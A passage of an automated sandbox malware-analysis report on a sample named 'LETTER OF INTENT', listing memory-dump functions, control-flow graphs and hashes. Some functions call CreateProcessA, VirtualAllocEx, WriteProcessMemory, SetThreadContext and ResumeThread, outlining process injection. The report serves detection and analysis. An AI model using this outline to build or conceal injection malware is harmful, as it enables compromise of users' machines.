              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 06e82f51f7ffa6dc8e6c02cb1aa8a2a20d4badae03f3a2073d6832aecaeb9fce
              • Instruction ID: c5ae192575fe726374cb88aa7456f8fce6435a7d5359b7996166e73dd8eaa347
              • Opcode Fuzzy Hash: 06e82f51f7ffa6dc8e6c02cb1aa8a2a20d4badae03f3a2073d6832aecaeb9fce
              • Instruction Fuzzy Hash: 344193B5E012198FDB08CFAAC9446AEBBF2BF89300F14C42AD518AB258DB345946CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 061C74F0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 61c74f0-61c7585 2 61c75be-61c75de 0->2 3 61c7587-61c7591 0->3 10 61c7617-61c7646 2->10 11 61c75e0-61c75ea 2->11 3->2 4 61c7593-61c7595 3->4 5 61c75b8-61c75bb 4->5 6 61c7597-61c75a1 4->6 5->2 8 61c75a5-61c75b4 6->8 9 61c75a3 6->9 8->8 12 61c75b6 8->12 9->8 17 61c767f-61c7739 CreateProcessA 10->17 18 61c7648-61c7652 10->18 11->10 13 61c75ec-61c75ee 11->13 12->5 15 61c75f0-61c75fa 13->15 16 61c7611-61c7614 13->16 19 61c75fc 15->19 20 61c75fe-61c760d 15->20 16->10 31 61c773b-61c7741 17->31 32 61c7742-61c77c8 17->32 18->17 21 61c7654-61c7656 18->21 19->20 20->20 22 61c760f 20->22 23 61c7658-61c7662 21->23 24 61c7679-61c767c 21->24 22->16 26 61c7664 23->26 27 61c7666-61c7675 23->27 24->17 26->27 27->27 28 61c7677 27->28 28->24 31->32 42 61c77d8-61c77dc 32->42 43 61c77ca-61c77ce 32->43 45 61c77ec-61c77f0 42->45 46 61c77de-61c77e2 42->46 43->42 44 61c77d0 43->44 44->42 48 61c7800-61c7804 45->48 49 61c77f2-61c77f6 45->49 46->45 47 61c77e4 46->47 47->45 50 61c7816-61c781d 48->50 51 61c7806-61c780c 48->51 49->48 52 61c77f8 49->52 53 61c781f-61c782e 50->53 54 61c7834 50->54 51->50 52->48 53->54
              APIs
              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 061C7726
              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: 8062e2d03806d866bd6043ae46acb255fb0e9fa68b7523b4841d8eaa6e4d78ae
              • Instruction ID: b64087ca3091f26c6627fe345d140edf170482decbf44bddc3db14b1f994a995
              • Opcode Fuzzy Hash: 8062e2d03806d866bd6043ae46acb255fb0e9fa68b7523b4841d8eaa6e4d78ae
              • Instruction Fuzzy Hash: 01916C71D00629CFEB50CFA8C845BEDBBB6BF58324F048569D819A7280DB749985CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 061C71D8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 56 61c71d8-61c7226 58 61c7228-61c7234 56->58 59 61c7236-61c7275 WriteProcessMemory 56->59 58->59 61 61c727e-61c72ae 59->61 62 61c7277-61c727d 59->62 62->61
              APIs
              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 061C7268
              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: fbe490c08e02fbf6a2ce0fdf86dc4f85244035c3a2717b79b9eb684ca248713d
              • Instruction ID: 8681485b65d62dda0da9437c660a935b19bd1ea00bbeeeb1a977832f5a7131b5
              • Opcode Fuzzy Hash: fbe490c08e02fbf6a2ce0fdf86dc4f85244035c3a2717b79b9eb684ca248713d
              • Instruction Fuzzy Hash: 672115719003599FCB50CFA9C984BEEBBF5FF48324F54882AE919A7240D7789954CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 061C72F8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 76 61c72f8-61c7385 ReadProcessMemory 79 61c738e-61c73be 76->79 80 61c7387-61c738d 76->80 80->79
              APIs
              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 061C7378
              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID: MemoryProcessRead
              • String ID:
              • API String ID: 1726664587-0
              • Opcode ID: 1e09708c6b47e547b0d01c600124102a314969eefbd284c29f1f5ed5a11e7bb5
              • Instruction ID: aef17e3c6d24f9eb1f2485e9e24e6b46c06d922415ae5dc3a222cf57301c1d1f
              • Opcode Fuzzy Hash: 1e09708c6b47e547b0d01c600124102a314969eefbd284c29f1f5ed5a11e7bb5
              • Instruction Fuzzy Hash: 1D2116718006599FCB00CFA9C984BEEBBF5FF48324F54882EE919A7240D7749944CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 061C6F50 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 66 61c6f50-61c6f9b 68 61c6f9d-61c6fa9 66->68 69 61c6fab-61c6fdb SetThreadContext 66->69 68->69 71 61c6fdd-61c6fe3 69->71 72 61c6fe4-61c7014 69->72 71->72
              APIs
              • SetThreadContext.KERNELBASE(?,00000000), ref: 061C6FCE
              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID: ContextThread
              • String ID:
              • API String ID: 1591575202-0
              • Opcode ID: fd77a37072c847c103e0546d332652cdb9555965217211ebffd8c6e38f3efb93
              • Instruction ID: 80c43d8224d920c485d56b80a1639d514fd4c0200d1cff233623c54c54bee0e8
              • Opcode Fuzzy Hash: fd77a37072c847c103e0546d332652cdb9555965217211ebffd8c6e38f3efb93
              • Instruction Fuzzy Hash: 17214971D007088FCB50CFA9C484BEEBBF4EF98228F54842ED419A7240CB78A944CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 061C70E8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 84 61c70e8-61c7163 VirtualAllocEx 87 61c716c-61c7191 84->87 88 61c7165-61c716b 84->88 88->87
              APIs
              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 061C7156
              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 1a1920a4d9ab567c76dfb5aa1145f765781406190e9f1d5b94e5af9850ec52a1
              • Instruction ID: adb8845774e4337eb1359f5c96d2d19d917a4ed3a8de3da3dfafe4aa4e061de5
              • Opcode Fuzzy Hash: 1a1920a4d9ab567c76dfb5aa1145f765781406190e9f1d5b94e5af9850ec52a1
              • Instruction Fuzzy Hash: 381167718002488FCF10DFA9C844BEFBBF9EF88324F148819E529A7240C775A944CFA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 061C6E70 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 92 61c6e70-61c6edf ResumeThread 95 61c6ee8-61c6f0d 92->95 96 61c6ee1-61c6ee7 92->96 96->95
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.249407205.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_61c0000_LETTER OF INTENT.jbxd
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: 6654a17d04a207031909f3dd3ef1e3e15ddc269cf20a29721e7bd468a1e7861b
              • Instruction ID: 319d8c0255c6f135b282365b4dbe80a5ecf208b620c652b7171438bf5b77309a
              • Opcode Fuzzy Hash: 6654a17d04a207031909f3dd3ef1e3e15ddc269cf20a29721e7bd468a1e7861b
              • Instruction Fuzzy Hash: 861128719006488FCB10DFAAC8447EFBBF9AF98224F14882ED419A7240C774A944CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01925658 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 100 1925658-19256a0 call 1924ffc 104 19256a5-19256a7 100->104 105 1925720-1925730 104->105 106 19256a9-19256cb 104->106 111 1925732-1925738 105->111 112 19256d0-19256d7 105->112 106->112 114 19256d8-19256e8 111->114 115 192573a-1925758 111->115 112->114 118 19256ea-1925713 114->118 119 1925719-192571f 114->119 118->119
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID: 3
              • API String ID: 0-1842515611
              • Opcode ID: e4f422076af5dc75748338af85ac1d01227837681e4d7940a902e4429ab4b124
              • Instruction ID: 474f1823201b57ee79abd8325894a1c48d54c8778073f0803595f30c5fa3834c
              • Opcode Fuzzy Hash: e4f422076af5dc75748338af85ac1d01227837681e4d7940a902e4429ab4b124
              • Instruction Fuzzy Hash: D7314731A043414FC711DB78D4185EEBFF9BF8125870688AED449DF29ADB319C0ACB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0192AA30 Relevance: .4, Instructions: 381COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 122 192aa30-192aa50 123 192aa52 122->123 124 192aa57-192aa79 122->124 123->124 129 192aa7f-192aa87 124->129 130 192ac8d-192ac95 124->130 131 192ac1c-192ac22 129->131 130->131 132 192ac24 131->132 133 192ac2b-192ac3d 131->133 132->133 134 192ac60-192ac69 132->134 135 192ac97-192ad0d call 192aa08 132->135 136 192ac87-192ac88 132->136 137 192aad5-192aade 132->137 138 192ac3f-192ac5e call 192a930 132->138 139 192adfc-192b0ed call 61c6aa8 * 3 132->139 140 192aa8c-192aa95 132->140 133->131 133->138 147 192ac70-192ac82 134->147 148 192ac6b 134->148 248 192ad10 call 61c5a18 135->248 249 192ad10 call 61c5a28 135->249 250 192ad10 call 61c5ac0 135->250 136->139 142 192aae0 137->142 143 192aae5-192ab02 137->143 138->131 138->134 245 192b0f3-192b112 139->245 145 192aa97 140->145 146 192aa9c-192aab3 140->146 142->143 158 192ab04 143->158 159 192ab09-192ab26 143->159 145->146 160 192aab5 146->160 161 192aaba-192aad0 146->161 147->136 148->147 158->159 166 192ab28 159->166 167 192ab2d-192ab4a 159->167 160->161 161->131 166->167 171 192ab51-192ab6e 167->171 172 192ab4c 167->172 178 192ab70 171->178 179 192ab75-192ab92 171->179 172->171 178->179 184 192ab94 179->184 185 192ab99-192abb3 179->185 184->185 190 192abb5 185->190 191 192abba-192abd4 185->191 187 192ad16-192ad30 195 192ad32 187->195 196 192ad37-192ad54 187->196 190->191 197 192abd6 191->197 198 192abdb-192abfb 191->198 195->196 203 192ad56 196->203 204 192ad5b-192adb0 196->204 197->198 205 192ac02-192ac1a 198->205 206 192abfd 198->206 203->204 218 192adb2 204->218 219 192adb7-192add4 204->219 205->134 206->205 218->219 223 192add6 219->223 224 192addb-192adf7 219->224 223->224 224->131 245->131 248->187 249->187 250->187
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 01080e498845e5635bb3c6611c6c18cb4c845f82a529aff44b1468b344e0a42e
              • Instruction ID: 727ccb756ead5cec04ce792e0e0b38d1131d46f39afbc43217477d1b4bf70daf
              • Opcode Fuzzy Hash: 01080e498845e5635bb3c6611c6c18cb4c845f82a529aff44b1468b344e0a42e
              • Instruction Fuzzy Hash: A0123D34902218CFDB50DFA8E949AACBBF9FB58305F0088A9E5099B390EF745D45CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01920709 Relevance: .2, Instructions: 178COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 332 1920709-192073a 333 1920741-19207a4 332->333 334 192073c 332->334 338 19208d9-1920902 333->338 334->333 340 1920908-1920927 338->340 341 19207a9-19207bb 338->341 342 19207c2-19207fd 341->342 343 19207bd 341->343 347 192083f-192085f 342->347 348 19207ff-1920817 342->348 343->342 349 1920861-192087a 347->349 350 192089d-19208cc 347->350 351 1920819 348->351 352 192081e-192083c 348->352 353 1920881-192089a 349->353 354 192087c 349->354 356 19208d3-19208d5 350->356 351->352 352->347 353->350 354->353 356->338
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 43dd988eee7cb8bb359ca6912496ea64ee3e0796561dae08684e80f36f302de5
              • Instruction ID: 6dde49b128d6e92f192e423cb9e12aeb3a40163dba140a7905f39da431475c4a
              • Opcode Fuzzy Hash: 43dd988eee7cb8bb359ca6912496ea64ee3e0796561dae08684e80f36f302de5
              • Instruction Fuzzy Hash: 7171C370E012198FCB08CFA9C5846ADBBF6FF88305F14856AE519EB354D774AA46CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01922290 Relevance: .2, Instructions: 155COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 404 1922290-192538e call 1924f24 411 1925390-19253a0 call 1924fb8 404->411 412 19253d7-19253df 404->412 416 19253a2-19253c3 call 1924fc4 411->416 417 19253e6-19253fb 411->417 412->417 422 19253cb-19253cd 416->422 423 1925402-1925452 417->423 422->423 424 19253cf-19253d6 422->424 428 1925458-1925469 423->428 429 19254d9-19254eb 423->429 432 192546b-1925476 428->432 433 1925478-1925496 432->433 434 1925499-19254af 432->434 433->434 434->432 437 19254b1-19254d8 434->437
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e9aaa2f52d1c126d5cfe446428cf214e9b5e8378f61a7fbff9384bf85fe72824
              • Instruction ID: c82cbf207e451373dff11cba72f3e58a253b0b543e71f7e588f6129082c775f3
              • Opcode Fuzzy Hash: e9aaa2f52d1c126d5cfe446428cf214e9b5e8378f61a7fbff9384bf85fe72824
              • Instruction Fuzzy Hash: 7151A231B002168FCB15DBB8D8488BEB7FAFFC42257198969E419DB395EF309C068791
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01921868 Relevance: .1, Instructions: 116COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 486 1921868-192188a 487 1921891-19218ce 486->487 488 192188c 486->488 490 19218d0 487->490 491 19218d5-19218de 487->491 488->487 490->491 492 19219a6-19219b9 491->492 494 19218e3-1921965 492->494 495 19219bf-19219d1 492->495 503 1921967 494->503 504 192196c 494->504 503->504 505 1921972-192199f 504->505 505->492 508 19219a1 505->508 508->492
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 37f4af14afff459e854a97b77f9a76c2fe78e7fa2373d4b409008b3a63da682c
              • Instruction ID: 3d678a7bd7516c1002a91566c75899e1feaf1ca7ba4aed2b89e08421d5ce9618
              • Opcode Fuzzy Hash: 37f4af14afff459e854a97b77f9a76c2fe78e7fa2373d4b409008b3a63da682c
              • Instruction Fuzzy Hash: 43410374E04218CFCB14EFE9E584AEEBBB6FF48300F10842AE444A7248EB345956CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0192159F Relevance: .1, Instructions: 114COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5d55f7acaa2a23fec37fdce4b1860ec5690a7dd2eba63eff3be953380a4b7d98
              • Instruction ID: cc6095b956b64d5cc7455bfbd7a7d3064f9f2334fca7d5386223b3ad77abf06d
              • Opcode Fuzzy Hash: 5d55f7acaa2a23fec37fdce4b1860ec5690a7dd2eba63eff3be953380a4b7d98
              • Instruction Fuzzy Hash: E841CF74E01218DFCB58DFA9D88499DBBF2FF89311B15806AE409AB365DB309942CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01920588 Relevance: .1, Instructions: 107COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7acd2a533de6dda8755633cd8dafbc300d505fb0df8cb7cf7ffa5b2bd60d8db2
              • Instruction ID: 403c383ba4317ce70741697b3020df1da7ca99c146550c1fa76bf86eb7359a0e
              • Opcode Fuzzy Hash: 7acd2a533de6dda8755633cd8dafbc300d505fb0df8cb7cf7ffa5b2bd60d8db2
              • Instruction Fuzzy Hash: 91410770C05219DFDB24DFA6D4187EDFBB5FB48305F249169E019A7294D3790A88CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01926D48 Relevance: .1, Instructions: 102COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a1c0cd47a79239c1f3b125d3a14f3d927c721d6999332bd28d588a5b93b9201f
              • Instruction ID: e2c0717fa39a74b3671e84abcb156c0add4ffca804c79a6bc3b25bdc13167d50
              • Opcode Fuzzy Hash: a1c0cd47a79239c1f3b125d3a14f3d927c721d6999332bd28d588a5b93b9201f
              • Instruction Fuzzy Hash: D441E670E012199FDB04CFAAD984AEEFBF2BF88300F15C56AE409AB355D7309942CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01925764 Relevance: .1, Instructions: 98COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 60ab6e540af4d43006b56d148bb9b695c48da42ef8bb47c95361956ad09bff62
              • Instruction ID: 9b02d2eabd69869b25a86ba71db60fbf6b6df1be99dfce433b3127ec2bc1e8c8
              • Opcode Fuzzy Hash: 60ab6e540af4d43006b56d148bb9b695c48da42ef8bb47c95361956ad09bff62
              • Instruction Fuzzy Hash: 5741EEB1D00759DBDB10CFA9C584ACEBBB5AF58304F258429D409BB204D7B5AA4ACF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01925770 Relevance: .1, Instructions: 96COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9c854fe78655ce0d24108e2d6e83a02dc45d4e1f0b70de7c595d3d1b1996cc49
              • Instruction ID: b937a53f6229d8b9e9a0e740af899c371d5fbeff9dd1372397bdc595b5bc249e
              • Opcode Fuzzy Hash: 9c854fe78655ce0d24108e2d6e83a02dc45d4e1f0b70de7c595d3d1b1996cc49
              • Instruction Fuzzy Hash: 4041DDB1D00219DBDB14CFA9C984ACEBBB9BF58304F258429D409AB204D7B56A4ACF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01920990 Relevance: .1, Instructions: 82COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f7c9638ed6ab3be7af32b24dea1b413a750bf9fef1b7b80c9449fe188a54975
              • Instruction ID: 4124fe04280e6a2aa3fdcb15f4258879f7fd2f05ab952fbac6d307ce4d8e4d75
              • Opcode Fuzzy Hash: 0f7c9638ed6ab3be7af32b24dea1b413a750bf9fef1b7b80c9449fe188a54975
              • Instruction Fuzzy Hash: 36312731E00218DFDB04CFE9D444AEEBBB6FF89310F548429E519BB258DB305985CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0192097F Relevance: .1, Instructions: 82COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5236f5b5e8d12cdcf156109fa6f6bb60e952251d286f4aecd324b122c6b4b5d1
              • Instruction ID: 01bb1e559319429a9276e33b86e667458cd65557aacc8ce9ecf3cf65b97654d9
              • Opcode Fuzzy Hash: 5236f5b5e8d12cdcf156109fa6f6bb60e952251d286f4aecd324b122c6b4b5d1
              • Instruction Fuzzy Hash: C0315831D00218DFDB04CFE8D859AEEBBB6FF89300F54842AE509BB264DB304945CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0156D054 Relevance: .1, Instructions: 77COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245211028.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_156d000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d8f809a79ee4cef7bf47cc85d5469553e6151a5d33e53e93e0c3fa732a1726e
              • Instruction ID: 3a940bf489484e0bbc3a7dc04c78fef6cdf2e6caa1d627c4f917da3105de17e9
              • Opcode Fuzzy Hash: 9d8f809a79ee4cef7bf47cc85d5469553e6151a5d33e53e93e0c3fa732a1726e
              • Instruction Fuzzy Hash: 2221E571604240DFCF15DF94D8C0B5ABBB9FB88324F248D69E9854F246C376D456CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 019203E3 Relevance: .1, Instructions: 76COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0fe60c3281cbd30cb60208745e1afd0c1b4be2def37024e95857b6fe71f3d4ff
              • Instruction ID: 1052ea860db3d333968a65a047ee6f1d0fd98c970ff669f6eeb3b89b21e1ecc9
              • Opcode Fuzzy Hash: 0fe60c3281cbd30cb60208745e1afd0c1b4be2def37024e95857b6fe71f3d4ff
              • Instruction Fuzzy Hash: 99216231C0A384AFC712EB78A8645CDBFB5EF43218F0589EBC095DB562E7344948CB51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0156D5AC Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245211028.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_156d000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: be3442fd4007925fd4b5e9ac2ed0b2f24e99de21ae05ba08cbcbe12eb4fca806
              • Instruction ID: b85ea57d417b2e0f3f71c00a82a0778d5a54e9a628679f0a94dc222495c7b2ca
              • Opcode Fuzzy Hash: be3442fd4007925fd4b5e9ac2ed0b2f24e99de21ae05ba08cbcbe12eb4fca806
              • Instruction Fuzzy Hash: F821F471600244DFDB01DF94D9C0F6ABBB9FB98224F248D69E8494F256C336D856CBE1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0157D01C Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245236370.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_157d000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d954aa3df94b5d6a75f6b100f42bc77dc45f360afa526af3d07a541b9f7313f0
              • Instruction ID: da33a4b33b11ff320e9194c30c83be7d03195ffb9345a3ec621fde595a8d833b
              • Opcode Fuzzy Hash: d954aa3df94b5d6a75f6b100f42bc77dc45f360afa526af3d07a541b9f7313f0
              • Instruction Fuzzy Hash: 2F21F175504240DFCB12CF94E9C4B1ABBA5FF84254F24C969D8094F246D336D846CA61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01920586 Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9057acbdb988b6c3613a1985e3b8040f1d83da35b8df04dad8ecb9ff3901cc2a
              • Instruction ID: 6c07e9a2f86e4fe2e1f8f6334a6803868a8d00a1d36874f360ffd014f9a5be75
              • Opcode Fuzzy Hash: 9057acbdb988b6c3613a1985e3b8040f1d83da35b8df04dad8ecb9ff3901cc2a
              • Instruction Fuzzy Hash: C631F570C00218DFEB14DFA6D4587EEBBB5FB88305F148169D419B7294D7790A88CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 019254F4 Relevance: .1, Instructions: 71COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0493f642c3f259c013eaa27635e8d147af9d74926a25df745bb43188d89de3c3
              • Instruction ID: 139b8a0d5af2e1d87b397a2d2440e423e16a3bf2d4c9fcbc254c152734116e9d
              • Opcode Fuzzy Hash: 0493f642c3f259c013eaa27635e8d147af9d74926a25df745bb43188d89de3c3
              • Instruction Fuzzy Hash: 9E31D1B0C013589FEB20CFA9C588BCEBFB5AB49318F25845AE408BB254C7755949CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01924F24 Relevance: .1, Instructions: 67COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
